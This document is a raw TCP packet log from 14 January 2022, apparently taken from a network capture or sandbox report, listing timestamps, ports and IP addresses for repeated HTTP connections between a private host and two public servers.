Jan 14, 2022 00:15:16.090789080 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.090826988 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.141208887 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:17.977710009 CET	49795	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.029452085 CET	80	49795	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.029891014 CET	49795	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.030102015 CET	49795	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.030121088 CET	49795	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.081572056 CET	80	49795	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.110333920 CET	80	49795	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.110352993 CET	80	49795	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.110477924 CET	49795	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.115761042 CET	49795	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.162597895 CET	49796	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.167685032 CET	80	49795	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.213093042 CET	80	49796	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.215780020 CET	49796	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.522155046 CET	49796	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.522352934 CET	49796	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.572952032 CET	80	49796	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.606898069 CET	80	49796	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.607065916 CET	49796	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.607222080 CET	49796	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.651626110 CET	49797	80	192.168.2.4	54.38.220.85
Jan 14, 2022 00:15:18.657211065 CET	80	49796	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.670420885 CET	80	49797	54.38.220.85	192.168.2.4
Jan 14, 2022 00:15:18.670797110 CET	49797	80	192.168.2.4	54.38.220.85
Jan 14, 2022 00:15:18.670958996 CET	49797	80	192.168.2.4	54.38.220.85
Jan 14, 2022 00:15:18.689542055 CET	80	49797	54.38.220.85	192.168.2.4
Jan 14, 2022 00:15:18.689579010 CET	80	49797	54.38.220.85	192.168.2.4
Jan 14, 2022 00:15:18.738877058 CET	49797	80	192.168.2.4	54.38.220.85
Jan 14, 2022 00:15:18.739664078 CET	49798	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.790626049 CET	80	49798	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.790714979 CET	49798	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.790867090 CET	49798	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.790909052 CET	49798	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.841448069 CET	80	49798	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.869662046 CET	80	49798	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:18.869759083 CET	49798	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.869934082 CET	49798	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:18.920610905 CET	80	49798	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:19.402679920 CET	49799	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.453329086 CET	80	49799	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:19.453425884 CET	49799	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.453546047 CET	49799	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.453572035 CET	49799	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.504178047 CET	80	49799	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:19.550434113 CET	80	49799	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:19.550539017 CET	49799	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.550582886 CET	49799	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.601243019 CET	80	49799	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:19.898886919 CET	49800	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.949187040 CET	80	49800	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:19.949287891 CET	49800	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.949436903 CET	49800	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:19.949459076 CET	49800	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.000507116 CET	80	49800	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.026201963 CET	80	49800	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.026324034 CET	49800	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.030024052 CET	49800	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.081717968 CET	80	49800	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.084069014 CET	49801	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.135912895 CET	80	49801	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.136027098 CET	49801	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.136152983 CET	49801	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.136183023 CET	49801	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.188002110 CET	80	49801	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.188018084 CET	80	49801	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.219078064 CET	80	49801	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.219176054 CET	49801	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.219374895 CET	49801	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.271291018 CET	80	49801	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.563299894 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.615397930 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.615576029 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.615684032 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.676876068 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.676897049 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.676913977 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.676928997 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.676944017 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.676984072 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.677020073 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.677231073 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.677289963 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.677406073 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.677427053 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.677442074 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.677458048 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.677481890 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.677509069 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.728910923 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.728931904 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.728949070 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.728965998 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.728981018 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.728996992 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729012012 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729022980 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729027033 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729043007 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729055882 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729059935 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729063988 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729069948 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729099035 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729259014 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729279041 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729294062 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729310036 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729327917 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729336023 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729342937 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729352951 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729360104 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729377031 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729387999 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729393005 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729409933 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.729428053 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.729456902 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781040907 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781064987 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781081915 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781097889 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781115055 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781130075 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781147957 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781147003 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781167030 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781177998 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781184912 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781186104 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781203032 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781209946 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781220913 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781239033 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781255960 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781266928 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781271935 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781280041 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781286001 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781302929 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781321049 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781337023 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781341076 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781352997 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781363010 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781371117 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781383038 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781388998 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781407118 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781421900 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781429052 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781438112 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781441927 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781455994 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781471968 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781486034 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781502008 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781502008 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781517982 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781523943 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781534910 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781552076 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781554937 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781568050 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781584024 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781590939 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781601906 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781616926 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781627893 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781634092 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781639099 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781650066 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781666994 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781682014 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781683922 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781697989 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.781728983 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.781749010 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834095001 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834192991 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834218979 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834270000 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834275007 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834336996 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834347963 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834357023 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834384918 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834417105 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834449053 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834489107 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834518909 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834557056 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834598064 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834610939 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834638119 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834656954 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834676027 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834678888 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834712982 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834750891 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834767103 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834789991 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834827900 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834841967 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834867954 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834907055 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834925890 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.834944963 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834984064 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.834996939 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835021019 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835059881 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835097075 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835098028 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835149050 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835153103 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835167885 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835211992 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835237980 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835251093 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835289955 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835304022 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835328102 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835366964 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835386992 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835403919 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835445881 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835465908 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835484982 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835534096 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835541010 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835594893 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835656881 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835665941 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835720062 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835741043 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835772038 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835800886 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835813046 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835843086 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835848093 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835881948 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835899115 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.835923910 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835961103 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.835974932 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.836000919 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.836045027 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.836052895 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.836067915 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.836118937 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888159990 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888200045 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888220072 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888237953 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888256073 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888257980 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888283968 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888298035 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888309956 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888331890 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888334036 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888356924 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888372898 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888381958 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888405085 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888428926 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888430119 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888453007 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888472080 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888477087 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888503075 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888525009 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888525963 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888549089 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888561010 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888575077 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888591051 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888612032 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888613939 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888638020 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888649940 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888659954 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888683081 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888704062 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888705969 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888727903 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888742924 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888751030 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888772964 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888787031 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888794899 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888818026 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888832092 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888839006 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888863087 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888879061 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888885021 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888911009 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888930082 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888935089 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888957024 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.888974905 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.888979912 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889014959 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889034986 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.889035940 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889059067 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889076948 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.889081955 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889105082 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889120102 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.889127970 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889149904 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889167070 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.889173031 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889195919 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889210939 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.889216900 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889240026 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889257908 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.889261961 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889285088 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.889297962 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941268921 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941298008 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941320896 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941361904 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941384077 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941416025 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941426992 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941450119 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941482067 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941488981 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941509008 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941514015 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941528082 CET	49802	80	192.168.2.4	93.189.42.167
